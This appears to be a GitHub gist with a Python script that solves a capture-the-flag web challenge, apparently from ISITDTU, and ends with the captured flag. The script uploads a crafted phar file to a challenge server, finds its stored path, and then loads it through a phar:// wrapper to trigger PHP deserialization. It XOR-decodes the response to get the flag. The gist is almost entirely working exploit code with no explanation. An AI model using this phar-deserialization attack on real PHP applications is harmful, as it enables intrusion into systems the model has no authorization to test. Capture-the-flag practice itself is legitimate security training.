Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
solve_multi_web.py
import requests
import binascii
from base64 import *
def xor(data, key):
from itertools import izip, cycle
xored = ''.join(chr(ord(x) ^ ord(y)) for (x, y) in izip(data, cycle(key)))
return xored
a = open("phar.phar", "rb").read()[34:]
save = open("phar.phar", "rb").read()[34:]
url = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?mytresure"
cookies = {"PHPSESSID": "e96ujfgcgvbji7425o2aabj06e"}
data = {"secret": xor("GIF","##\n"), "save": save}
s = requests.Session()
proxy = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
r = s.post(url, data=data, proxies=proxy, cookies=cookies)
r = s.get(url, proxies=proxy, cookies=cookies)
data = r.content.decode("utf-8").split(
"""<div class="alert alert-warning">Your original treasure stored at""")[1].split(" </div>")[0].strip().replace(".txt", "")
url2 = "http://192.241.144.92/oldchall/e9941d1621bdf00ef6a17c1e5176c1bcbb966b71/index.php?secret=" + xor("GIF", "##\n") + \
"&friendtresure=phar://" + data
content = s.get(url2, proxies=proxy, cookies=cookies).text.split(
'<img src="data:images/png;base64,')[1].replace('" height="300" width="800">','').strip()
print(xor(b64decode(content), xor("GIF", "##\n")))
# ISITDTU{850d5f07cd08a49a0f74d6a089353f3196e74d7e}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment